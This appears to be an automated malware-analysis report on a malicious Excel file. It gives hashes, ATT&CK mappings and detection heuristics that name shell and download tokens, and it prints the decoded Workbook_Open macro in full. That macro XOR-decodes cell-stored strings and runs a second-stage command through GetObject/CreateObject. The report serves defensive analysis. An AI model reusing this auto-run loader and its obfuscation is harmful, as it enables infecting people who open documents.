Office (OLE) / .XLS malware analysis — malicious · 041afb6b7603efad

MALICIOUS

Office (OLE) / .XLS

49.0 KB Created: 2023-04-17 02:26:27 Authoring application: Microsoft Excel First seen: 2023-04-19

MD5: 8fbe01336dbc0be5d7fbb5423a22f64b SHA-1: d1b66fb309ffd965ebd4b12ff24e0298f8b2312b SHA-256: 041afb6b7603efad11eb8fba6b3198189c14bbafa7ad622eba91d83df549c97a

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. This macro is designed to execute obfuscated VBA code that uses GetObject and CreateObject to download and run a second-stage payload. The specific strings used to construct the commands are dynamically retrieved from cells within the 'm76f6' sheet, making direct IOC extraction difficult but indicating a downloader pattern.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

                                                                Set Establishing = GetObject(Melissa).CreateObject(IntermedIate)

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

                                                                Set Establishing = GetObject(Melissa).CreateObject(IntermedIate)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4624 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4624 bytes
SHA-256: `e24013007c83681a3eefb730746c1e0596d1eef0202eed1184598ea5c5be5efa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Soldier As String Private Collaborative As String Private Skype As String Private CorreCtly As String Private Establishing As Object Private Sub Terror() Dim Melissa As String, Meals As String, Dispute As String, IntermedIate As String GoTo Meals Neutral: Melissa = Introduce(Soldier): Meals = Introduce(Collaborative): Dispute = Introduce(Skype): IntermedIate = Introduce(CorreCtly) Set Establishing = GetObject(Melissa).CreateObject(IntermedIate) GoTo Liked Meals: Soldier = Sheets("m76f6").Range("J162").Value: Collaborative = Sheets("m76f6").Range("J173").Value: Skype = Sheets("m76f6").Range("J146").Value: CorreCtly = Sheets("m76f6").Range("F114").Value GoTo Neutral Liked: Establishing.Run Dispute & " " & Meals, 0 End Sub Sub Workbook_Open() GoTo EngagEmEnt Dim Outer As String Outer = InputBox("enter the first number") Dim Drawings As String Drawings = InputBox("enter the last number") MsgBox Outer MsgBox Drawings EngagEmEnt: If Outer = "" Then Terror End If End Sub Private Function Makers(ByVal Hearts As String) As Variant Dim Deutsch() As Byte, i As Long, SeedS As Integer i = 0: ReDim Deutsch(0 To (Len(Hearts) / 2)) As Byte Outer: If i < Len(Hearts) Then SeedS = SeedS + 1 Deutsch(SeedS - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Hearts, i + 1, 2) i = i + 2 GoTo Outer Else GoTo Drawings End If Drawings: Makers = Deutsch End Function Private Function Introduce(ByVal Refine As String) As Variant Dim Distinct As Long: Distinct = 0: Dim Orchestra() As Byte: Dim Reset() As Byte, Deutsch As String, SeedS As Integer Reset = "jf64689816" GoTo Britney Knife: Dim Drawings As String Drawings = InputBox("put calc number") MsgBox Drawings InstallIng: If Distinct < UBound(Orchestra) Then SeedS = Distinct Mod (10) GoTo Melissa Meals: Deutsch = Deutsch & Chr(Orchestra(Distinct)) Distinct = Distinct + 1 GoTo InstallIng Else GoTo DeleteD End If Hearts: MsgBox "err -52525" Dim Outer As String Outer = InputBox("") MsgBox Outer DeleteD: Introduce = Deutsch Exit Function Britney: Orchestra = Makers(Refine) GoTo InstallIng Melissa: Orchestra(Distinct) = Abs(Orchestra(Distinct) Xor Reset(SeedS * 2)) GoTo Meals End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: e24013007c83681a3eefb730746c1e0596d1eef0202eed1184598ea5c5be5efa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit







                                                                    Private Soldier As String





             





                  Private Collaborative As String








                                                                            Private Skype As String
Private CorreCtly As String







                                                        Private Establishing As Object

Private Sub Terror()
Dim Melissa As String, Meals As String, Dispute As String, IntermedIate As String
GoTo Meals






Neutral:
Melissa = Introduce(Soldier): Meals = Introduce(Collaborative): Dispute = Introduce(Skype): IntermedIate = Introduce(CorreCtly)







                                                                Set Establishing = GetObject(Melissa).CreateObject(IntermedIate)
GoTo Liked
Meals:
Soldier = Sheets("m76f6").Range("J162").Value: Collaborative = Sheets("m76f6").Range("J173").Value: Skype = Sheets("m76f6").Range("J146").Value: CorreCtly = Sheets("m76f6").Range("F114").Value
GoTo Neutral
Liked:
Establishing.Run Dispute & " " & Meals, 0
End Sub
Sub Workbook_Open()
GoTo EngagEmEnt
Dim Outer As String








                                                






                                            Outer = InputBox("enter the first number")
Dim Drawings As String
Drawings = InputBox("enter the last number")
MsgBox Outer






                                                            MsgBox Drawings





EngagEmEnt:







                                                If Outer = "" Then
Terror
End If







                                                                    End Sub
Private Function Makers(ByVal Hearts As String) As Variant








                  Dim Deutsch() As Byte, i As Long, SeedS As Integer
i = 0: ReDim Deutsch(0 To (Len(Hearts) / 2)) As Byte








Outer:







                   




                 





                   If i < Len(Hearts) Then
SeedS = SeedS + 1







               Deutsch(SeedS - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Hearts, i + 1, 2)







                 i = i + 2





          GoTo Outer







                                                                    




                                            Else






           





                                        GoTo Drawings







                                                






             






                






                                                        End If







Drawings:
Makers = Deutsch
End Function
Private Function Introduce(ByVal Refine As String) As Variant
Dim Distinct As Long: Distinct = 0: Dim Orchestra() As Byte: Dim Reset() As Byte, Deutsch As String, SeedS As Integer
Reset = "jf64689816"
GoTo Britney
Knife:
Dim Drawings As String
Drawings = InputBox("put calc number")
MsgBox Drawings








InstallIng:







                                                                        If Distinct < UBound(Orchestra) Then
SeedS = Distinct Mod (10)








              GoTo Melissa
Meals:
Deutsch = Deutsch & Chr(Orchestra(Distinct))
Distinct = Distinct + 1
GoTo InstallIng





                                                                        Else






                  GoTo DeleteD
End If





Hearts:
MsgBox "err -52525"
Dim Outer As String
Outer = InputBox("")
MsgBox Outer
DeleteD:
Introduce = Deutsch







                                                            Exit Function







              




Britney:
Orchestra = Makers(Refine)





                  GoTo InstallIng
Melissa:
Orchestra(Distinct) = Abs(Orchestra(Distinct) Xor Reset(SeedS * 2))
GoTo Meals
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.